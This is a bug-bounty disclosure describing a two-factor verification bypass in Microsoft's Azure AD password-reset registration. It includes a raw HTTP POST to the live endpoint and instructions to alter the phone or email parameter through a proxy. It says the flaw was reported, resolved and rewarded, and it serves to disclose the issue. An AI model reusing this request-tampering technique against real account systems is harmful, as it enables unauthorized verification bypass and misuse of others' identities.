EN | Microsoft Authentication Bypass Vulnerability

Greetings,

Summary

Vulnerability allows you to confirm a phone number or mail that you own or not.  So you have bypassed the two factor authentication verification. Two-step verification must be active so leak can ocur. At the same time, the 2fa verification must be mandatory by the administrator. You can add the phone number or e-mail address to the corporate e-mail address without knowing it. This is very big in terms of computer forensic. A criminal offense may appear attached to your email address as confirmed by your phone. So you can be in a criminal position. Think that your phone number has been approved at wannacry’s email address, Hello FBI it’s not me, it’s 0day 🙂

Steps To Reproduce

Step1:

The administrator must approve a two factor authentication and request you to add the phone number from your account when logging in.

Step2:

I tried atony first through phone number. When I realized that I went on from the mail address.

Step 3:

Let us examine the outgoing request when we press the verification buton;

POST /passwordreset/SendEmail.ajax HTTP/1.1
Host: account.activedirectory.windowsazure.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
AjaxSessionKey: null
__RequestVerificationToken: xkbu4lBzTLi4syPavllsrfnvFxXgEWQIGC1sadasdaxxHuzbcu01
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: https://account.activedirectory.windowsazure.com/passwordreset/register.aspx?client-request-id=x&sspr=1
Content-Length: 455
Cookie: flt=0; BOX.SessionCacheKey.SessID=cac246d0-xxxx-4bb5-879c-9xxxxe5ba1; BOX.SessionCacheKey.sspr-reg-ru=https://login.microsoftonline.com/common/SAS/ProcessAuth?request=rxxxxG5dO028RI59EjuJL3VO43C; BOX.CacheKey.CachedCSSFiles=1.0.0.1960:0xxxxxxFEDxx40xDB475A4C0x9B3Fxxxx2487
DNT: 1
Connection: close

p0=%7B%22UserCompanyName%22%3A%22Lostar%22%2C%22MobileCountryCode%22%3A%2290%22%2C%22MobileCountryCodeIndex%22%3A213%2C%22MobilePhoneNumber%22%3A%22x%22%2C%22AltEmail%22%3A%22berk.imran7%40gmail.com%22%2C%22RegistrationAttribute%22%3A%22AlternateEmailAttribute%22%2C%22MobilePhoneValidationOptionKey%22%3A%22%22%7D&assembly=BOX.AzurePortalWebsite, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null&class=Microsoft.Online.BOX.Admin.UI.Register

When I examine the outgoing post request and when I perform url decode;

p0={"UserCompanyName":"Lostar","MobileCountryCode":"90","MobileCountryCodeIndex":213,"MobilePhoneNumber":"{Phone number}","AltEmail":"[email protected]","RegistrationAttribute":"AlternateEmailAttribute","MobilePhoneValidationOptionKey":""}&assembly=BOX.AzurePortalWebsite, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null&class=Microsoft.Online.BOX.Admin.UI.Register

All you need to do is change the phone number or mail address with Proxy. Namely;

p0={"UserCompanyName":"Lostar","MobileCountryCode":"90","MobileCountryCodeIndex":213,"MobilePhoneNumber":"{Phone number}","AltEmail":"[email protected]","RegistrationAttribute":"AlternateEmailAttribute","MobilePhoneValidationOptionKey":""}&assembly=BOX.AzurePortalWebsite, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null&class=Microsoft.Online.BOX.Admin.UI.Register

Step4:

Got e-mail.

Step5:

Boom!

Proof of Concept

Timeline

October 10: Report Submitted
October 16: Report reviewed
October 18 – 21: Discussion
November 17: Report closed as resolved
Final: Award and hall of fame.

Thanks
Best Regards
Berk İmran